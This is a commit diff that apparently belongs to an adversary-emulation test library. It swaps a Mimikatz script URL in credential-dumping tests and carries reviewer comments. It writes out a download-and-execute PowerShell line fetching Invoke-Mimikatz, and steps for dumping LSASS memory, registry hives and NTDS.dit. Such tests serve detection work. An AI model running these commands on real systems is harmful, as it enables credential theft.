Update t1003 url (#405)

* update url

* Generate docs from job=validate_atomics_generate_docs branch=Update-T1003-url
This commit is contained in:
caseysmithrc
2019-02-06 11:52:11 -07:00
committed by Zac Brown
parent a69319c513
commit a53eb4d327
3 changed files with 45 additions and 41 deletions
+8 -8
@@ -162,7 +162,7 @@ Dumps Credentials via Powershell by invoking a remote mimikatz script
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_script | URL to a remote Mimikatz script that dumps credentials | Url | https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1|
| remote_script | URL to a remote Mimikatz script that dumps credentials | Url | https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1|
#### Run it with `powershell`!
```
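Review bot: the new default tracks the `dev` branch of EmpireProject/Empire rather than a fixed revision, so the script this test fetches can change or disappear without any change in this repository; pin the raw URL to a commit SHA (`https://raw.githubusercontent.com/EmpireProject/Empire/<commit-sha>/data/module_source/credentials/Invoke-Mimikatz.ps1`) and say in the commit message why the PowerSploit URL was replaced, which "update url" does not.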
@@ -219,7 +219,7 @@ reg save HKLM\security security
<br/>
## Atomic Test #5 - Dump LSASS.exe Memory using ProcDump
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
ProcDump. The tool may be downloaded from https://docs.microsoft.com/en-us/sysinternals/downloads/procdump.
**Supported Platforms:** Windows
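Review bot: this hunk, like the other description hunks in this file, changes only trailing whitespace on the first line of the description; that is expected when the docs are regenerated from the YAML as the commit message says, but whitespace-only churn would be easier to review as its own commit rather than mixed with the URL change.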
@@ -238,7 +238,7 @@ procdump.exe -accepteula -ma lsass.exe #{output_file}
<br/>
## Atomic Test #6 - Dump LSASS.exe Memory using Windows Task Manager
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
Manager and administrative permissions.
**Supported Platforms:** Windows
@@ -246,11 +246,11 @@ Manager and administrative permissions.
#### Run it with these steps!
1. Open Task Manager:
On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking
On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking
on the task bar and selecting "Task Manager".
2. Select lsass.exe:
If lsass.exe is not visible, select "Show processes from all users". This will allow you to observe execution of lsass.exe
If lsass.exe is not visible, select "Show processes from all users". This will allow you to observe execution of lsass.exe
and select it for manipulation.
3. Dump lsass.exe memory:
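Review bot: step 2 still tells the operator to click "Show processes from all users", a control that exists in the Windows 7 Task Manager but not in the Windows 8/10 Task Manager, where lsass.exe is listed on the Details tab (and as "Local Security Authority Process" on the Processes tab); since the test declares Supported Platforms: Windows with no version, the step should describe both layouts.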
@@ -261,7 +261,7 @@ Manager and administrative permissions.
<br/>
## Atomic Test #7 - Offline Credential Theft With Mimikatz
The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with
The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with
Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz.
**Supported Platforms:** Windows
@@ -287,8 +287,8 @@ Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz.
<br/>
## Atomic Test #8 - Dump Active Directory Database with NTDSUtil
The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability
uses the "IFM" or "Install From Media" backup functionality that allows Active Directory restoration or installation of
The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability
uses the "IFM" or "Install From Media" backup functionality that allows Active Directory restoration or installation of
subsequent domain controllers without the need of network-based replication.
**Supported Platforms:** Windows
+9 -9
@@ -12,7 +12,7 @@ atomic_tests:
remote_script:
description: URL to a remote Mimikatz script that dumps credentials
type: Url
default: https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
default: https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1
executor:
name: powershell
command: |
@@ -58,7 +58,7 @@ atomic_tests:
- name: Dump LSASS.exe Memory using ProcDump
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
ProcDump. The tool may be downloaded from https://docs.microsoft.com/en-us/sysinternals/downloads/procdump.
supported_platforms:
- windows
@@ -74,7 +74,7 @@ atomic_tests:
- name: Dump LSASS.exe Memory using Windows Task Manager
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
Manager and administrative permissions.
supported_platforms:
- windows
@@ -82,11 +82,11 @@ atomic_tests:
name: manual
steps: |
1. Open Task Manager:
On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking
On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking
on the task bar and selecting "Task Manager".
2. Select lsass.exe:
If lsass.exe is not visible, select "Show processes from all users". This will allow you to observe execution of lsass.exe
If lsass.exe is not visible, select "Show processes from all users". This will allow you to observe execution of lsass.exe
and select it for manipulation.
3. Dump lsass.exe memory:
@@ -95,7 +95,7 @@ atomic_tests:
- name: Offline Credential Theft With Mimikatz
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with
The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with
Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz.
supported_platforms:
- windows
@@ -118,8 +118,8 @@ atomic_tests:
- name: Dump Active Directory Database with NTDSUtil
description: |
The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability
uses the "IFM" or "Install From Media" backup functionality that allows Active Directory restoration or installation of
The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability
uses the "IFM" or "Install From Media" backup functionality that allows Active Directory restoration or installation of
subsequent domain controllers without the need of network-based replication.
supported_platforms:
- windows
@@ -131,4 +131,4 @@ atomic_tests:
executor:
name: command_prompt
command: |
ntdsutil “ac i ntds” “ifm” “create full #{output_folder} q q
ntdsutil “ac i ntds” “ifm” “create full #{output_folder} q q
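Review bot: the ntdsutil command uses typographic quotes (“ ”) instead of ASCII double quotes, which cmd.exe does not treat as quoting, and the third argument `“create full #{output_folder}` has no closing quote, so `q q` is not passed as two separate quit commands; this hunk only adds a trailing newline and carries both defects forward. Suggested: `ntdsutil "ac i ntds" "ifm" "create full #{output_folder}" q q`.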
+28 -24
@@ -13445,7 +13445,7 @@ credential-access:
remote_script:
description: URL to a remote Mimikatz script that dumps credentials
type: Url
default: https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
default: https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1
executor:
name: powershell
command: 'IEX (New-Object Net.WebClient).DownloadString(''#{remote_script}'');
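Review bot: `IEX (New-Object Net.WebClient).DownloadString(''#{remote_script}'')` executes whatever the URL returns with no integrity check, and the new default now follows a branch rather than a tag or commit, so the test's behaviour is controlled by a third party's push history; add an optional expected-hash input that is compared against the downloaded string before `IEX`, or at least state in `description` that the script is run in-memory from the remote source.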
@@ -13492,9 +13492,9 @@ credential-access:
reg save HKLM\system system
reg save HKLM\security security
- name: Dump LSASS.exe Memory using ProcDump
description: "The memory of lsass.exe is often dumped for offline credential
theft attacks. This can be achieved with Sysinternals \nProcDump. The tool
may be downloaded from https://docs.microsoft.com/en-us/sysinternals/downloads/procdump.\n"
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
ProcDump. The tool may be downloaded from https://docs.microsoft.com/en-us/sysinternals/downloads/procdump.
supported_platforms:
- windows
input_arguments:
@@ -13508,25 +13508,28 @@ credential-access:
'
- name: Dump LSASS.exe Memory using Windows Task Manager
description: "The memory of lsass.exe is often dumped for offline credential
theft attacks. This can be achieved with the Windows Task \nManager and administrative
permissions.\n"
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
Manager and administrative permissions.
supported_platforms:
- windows
executor:
name: manual
steps: "1. Open Task Manager:\n On a Windows system this can be accomplished
by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking
\n on the task bar and selecting \"Task Manager\".\n\n2. Select lsass.exe:\n
\ If lsass.exe is not visible, select \"Show processes from all users\".
This will allow you to observe execution of lsass.exe \n and select it
for manipulation.\n\n3. Dump lsass.exe memory:\n Right-click on lsass.exe
in Task Manager. Select \"Create Dump File\". The following dialog will
show you the path to the saved file.\n"
steps: |
1. Open Task Manager:
On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking
on the task bar and selecting "Task Manager".
2. Select lsass.exe:
If lsass.exe is not visible, select "Show processes from all users". This will allow you to observe execution of lsass.exe
and select it for manipulation.
3. Dump lsass.exe memory:
Right-click on lsass.exe in Task Manager. Select "Create Dump File". The following dialog will show you the path to the saved file.
- name: Offline Credential Theft With Mimikatz
description: "The memory of lsass.exe is often dumped for offline credential
theft attacks. Adversaries commonly perform this offline analysis with \nMimikatz.
This tool is available at https://github.com/gentilkiwi/mimikatz.\n"
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with
Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz.
supported_platforms:
- windows
input_arguments:
@@ -13546,11 +13549,10 @@ credential-access:
3. Obtain Credentials:
Within the Mimikatz interactive shell, execute `sekurlsa::logonpasswords full`
- name: Dump Active Directory Database with NTDSUtil
description: "The Active Directory database NTDS.dit may be dumped using NTDSUtil
for offline credential theft attacks. This capability \nuses the \"IFM\" or
\"Install From Media\" backup functionality that allows Active Directory restoration
or installation of \nsubsequent domain controllers without the need of network-based
replication.\n"
description: |
The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability
uses the "IFM" or "Install From Media" backup functionality that allows Active Directory restoration or installation of
subsequent domain controllers without the need of network-based replication.
supported_platforms:
- windows
input_arguments:
@@ -13560,7 +13562,9 @@ credential-access:
default: C:\Atomic_Red_Team
executor:
name: command_prompt
command: 'ntdsutil “ac i ntds” “ifm” “create full #{output_folder} q q'
command: 'ntdsutil “ac i ntds” “ifm” “create full #{output_folder} q q
'
T1081:
technique:
id: attack-pattern--ba8e391f-14b5-496f-81f2-2d5ecd646c1c